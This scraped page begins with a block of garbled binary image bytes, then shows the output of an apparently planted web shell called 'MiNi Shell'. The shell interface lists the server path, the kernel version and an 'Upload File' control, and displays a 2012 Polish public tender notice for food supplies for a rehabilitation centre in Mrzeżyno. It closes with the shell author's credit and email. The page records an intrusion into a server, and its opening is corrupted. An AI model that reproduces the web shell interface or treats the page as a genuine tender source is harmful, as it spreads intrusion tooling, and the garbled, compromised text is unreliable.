JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/47906-N-2012.html

<p class="kh_header"><b>Szczecin: Zakup i dostawa artykułów spożywczych dla potrzeb Ośrodka Wczasowo-Rehabilitacyjnego z siedzibą w Mrzeżynie przy ul. Śliskiej 5.</b><br>
<b>Numer ogłoszenia: 47906 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nieruchomości i Opłaty Lokalne Sp. z o.o. , ul. Czesława 9, 71-804 Szczecin, woj. zachodniopomorskie, tel. 91 421 63 23, faks 91 421 63 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niol.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych dla potrzeb Ośrodka Wczasowo-Rehabilitacyjnego z siedzibą w Mrzeżynie przy ul. Śliskiej 5..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest - zakup i dostawa nw. artykułów spożywczych dla potrzeb OWR AGAWA w Mrzeżynie przy ul. Śliskiej  5.

Nazwa produktu	          Waga opakowania	Jednostka miary	Ilość
Ananas plastry (puszka)	3030g.	                     szt.	24
Ananas plastry (puszka)	580g.	                     szt.	36
Bazylia 	                         20g.	                     szt.	10
Biszkopty bezglutenowe	250g.	                     kg	              3
Brzoskwinie (puszka)	2650g.	                     szt.	24
Brzoskwinie (puszka)	820g.	                     szt.	36
Budyń czekoladowy 	1kg.	                     szt.	10
Budyń śmietankowy 	1kg.	                     szt.	10
Budyń waniliowy 	             1kg.	                     szt.	10
Cebulka konserwowa 	314g.	                     szt.	30
Chrzan tarty 	             180g.	                     szt.	30
Ciastka bez cukru 	             125g.	                     szt.	15
Ciastka bezglutenowe 	150g.	                     szt.	10
Ciastka kokosowe bez cukru 	125g.	                     szt. 	70
Cukier 	                          25kg.	                     szt.	70
Cukier 	                            1kg.	                     szt.	180
Cukier puder 	             0,5kg.	                     szt.	30
Cukier waniliowy 	               32g.	                     szt.	100
Cynamon mielony	               20g.	                     szt.	20
Czekolada 0% cukru 	  80g.	                     szt.	80
Przyprawa do mięs typu Delikat Knorr 	   700g.	        szt.	36
Przyprawa do drobiu typu Delikat Knorr   600g.	        szt.	36
Przyprawa do ryb typu Delikat Knorr 	   600g.	        szt.	36
Dżem agrestowy niskosłodzony do 45% cukru	 7kg. szt.	              5
Dżem z aronii niskosłodzony do 45% cukru	 7kg. szt.	              5
Dżem brzoskwiniowy niskosłodzony do 45% cukru 7kg.szt.	             10
Dżem z czarnej porzeczki niskosłodz. do 45% cukru 7kg.	szt.	30
Dżem ze śliwek niskosłodzony do 45% cukru	  7kg.     szt.	10
Dżem truskawkowy niskosłodzony do 45% cukru	  7kg.	szt.	30
Dżem bez cukru	                                310g.	szt.	60
Fasola Jaś	                                  1kg.	kg	100
Fasolka konserwowa	                   2,5kg.	szt.	70
Galaretka agrestowa	                     1kg.	szt.	20
Galaretka cytrynowa	                     1kg.	szt.	20
Galaretka pomarańczowa	                     1kg.	szt.	20
Galaretka truskawkowa	                     1kg.	szt.	20
Galaretka wiśniowa	                                  1kg.            szt.	20
Galaretki różne	                                  90g.	szt.	100
Gałka muszkatołowa	                     20g.	szt.	20
Groch łuskany połówki	                     1kg.	kg	60
Groszek ptysiowy	                                  80g.	szt.	20
Groszek konserwowy	                   2,6kg.	szt.	20
Groszek konserwowy	                    400g.	szt.	50
Herbata expresowa typu Lipton	100 torebek	szt.	100
Herbata expresowa typu Saga	200 torebek	szt.	400
Jabłka prażone	                           wiadro 5kg.	szt.	50
Kakao typu Decomoreno	                     200g.	szt.	30
Kasza gryczana	                                   1kg.	kg	80
Kasza jęczmienna	                                   1kg.	kg	60
Kasza manna	                                   1kg.	kg	80
Kasza bezglutenowa	                    0,5kg.	kg	11
Kasza kukurydziana	                     350g.	szt.	150
Kawa rozpuszczalna typu Jacobs	        200g.	szt.	100
Kawa mielona sypana typu Jacobs Kronung   200g.	szt.	30
Ketchup łagodny typu Kotlin	                       3kg.	szt.	30
Ketchup łagodny typu Kotlin	                       1kg.	szt.	150
Kisiel cytrynowy typu Winiary	          1kg.	szt.	10
Kisiel malinowy typu Winiary	                       1kg.	szt.	10
Kisiel truskawkowy typu Winiary	          1kg.	szt.	10
Kisiel wiśniowy typu Winiary	                       1kg.	szt.	10
Kisiel pomarańczowy	                       1kg.	szt.	10
Kompot z czarnych porzeczek	          0,9l.	szt.	100
Kompot ze śliwek	                                    0,9l.	szt.	100
Kompot truskawkowy	                       0,9l.	szt.	100
Kompot wiśniowy	                                    0,9l.	szt.	100
Koncentrat pomidorowy typu Kotlin	          1kg.	szt.	100
Kotlety sojowe	                                  500g.	kg	10
Kotlety wegetariańskie	                         -	kg	20
Kukurydza konserwowa	                     2,6kg.	szt.	100
Kukurydza konserwowa	                      400g.	szt.	30
Kwasek cytrynowy	                                    1kg.	szt.	25
Kwasek cytrynowy	                                    20g.	szt.	200
Liść laurowy	                                    12g.	szt.	20
Majeranek	                                  150g.	szt.	20
Majonez typu Winiary	                     700g.	szt.	70
Makaron bezglutenowy	                         -	kg	10
Makaron -kolanko z falbankami	            -	kg	100
Makaron -muszelka	                         -	kg	70
Makaron -świderki                                      -	kg	160
Makaron -krajanka, typu czarniecki min. 5 jajeczny -	kg	600
Zacierki -babuni, min. 2 jajeczne	         250g.	szt.	470
Makaron -rurka	                                      -	kg	100
Marmolada	                                    7kg.	szt.	5
Miód wielokwiatowy	                       25g.	szt.	100
Musztarda delikatesowa stołowa	          1kg.	szt.	65
Musztarda delikatesowa stołowa	          5kg.	szt.	11
Mąka pszenna typ 500	                       1kg.	szt.	60
Mąka pszenna typ 500	                     25kg.	szt.	40
Mąka bezglutenowa	                         -	kg	10
Ocet spirytusowy 10%	                      0,5l.	szt.	60
Ogórki konserwowe	                                 900g.           szt.	45
Ogórki konserwowe	                              1500ml.	szt.	170
Olej uniwersalny	                                     5l.	szt.	260
Olej typu kujawski	                                     1l.	szt.	40
Oregano	                                               20g.	szt.	10
Papryka konserwowa - ćwiartki	        0,9l.	szt.	200
Papryka słodka - proszek	                     20g.	szt.	100
Papryka ostra - proszek 	                     20g.	szt.	100
Pieczarki sterylizowane	                     3kg.	szt.	100
Pieczarki sterylizowane - całe 	     870ml.	szt.	16
Pieprz czarny mielony	                     1kg.	szt.	4
Pieprz czarny mielony	                     15g.	szt.	200
Pieprz ziołowy	                                 20g.	szt.	30
Proszek do pieczenia 	                    36g.	szt.	30
Przyprawa do zup w płynie typu Knorr	       1,0l.	szt.	60
Ziele angielskie	                                 20g.	szt.	40
Rosół z kury - kostka 	                    60g.	szt.	150
Ryż	                                              1kg.	szt.	300
Słodzik	                                          100szt.	szt.	50
Słodzik w płynie	                              250ml.	szt.	25
Sos pieczeniowy ciemny typu Knorr	     1,3kg.	szt.	20
Sos pieczarkowo-borowikowy typu Knorr   1,2kg.	szt.	20
Szparagi konserwowe	                   330g.	szt.	20
Sól jodowana	                                 1kg.	szt.	400
Przyprawa typu Vegeta Podravka	        1kg.	szt.	100
Wafle bez cukru	                                 95g.	szt.	30
Zioła prowansalskie	                                 10g.	szt.	10
Żelatyna	                                              40g.	szt.	30
Tymianek	                                              10g.	szt.	5
Płatki kukurydziane	                                500g.	szt.	200
Bułka tarta bezglutenowa	                   500g.	szt.	10
Płatki jęczmienne	                                500g.	szt.	100
Zupa szparagowa (w proszku) typu Knorr    4kg.	szt.	8
Przecier ogórkowy	                                900g.	szt.	40
Szczaw konserwowy	                   900g.	szt.	40
Makaron lasagne	                                500g.	szt.	40
Zupa pieczarkowa (w proszku) typu Knorr    4kg.	szt.	8
Zupa borowikowa (w proszku) typu Knorr     4kg.	szt.	8
Borowik szlachetny suszony	                   500g.	szt.	4
Podgrzybek suszony	                   500g.	szt.	4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy mają dołączyć do oferty następujące dokumenty:
1) ofertę cenową zgodnie z Rozdziałem I pkt. 3 SIWZ,
2) odpowiednie pełnomocnictwa
3) oświadczenie według wzoru stanowiącego Załącznik Nr 1 do SIWZ - wskazujące część zamówienia której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.niol.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nieruchomości i Opłaty Lokalne Sp. z o.o.
ul. Czesława 9
71-504 Szczecin
Wydział Zarządzania Nieruchomościami.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2012 godzina 10:00, miejsce: Nieruchomości i Opłaty Lokalne Sp. z o.o.
ul. Czesława 9
71-504 Szczecin
sekretariat, pok. 24, II p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com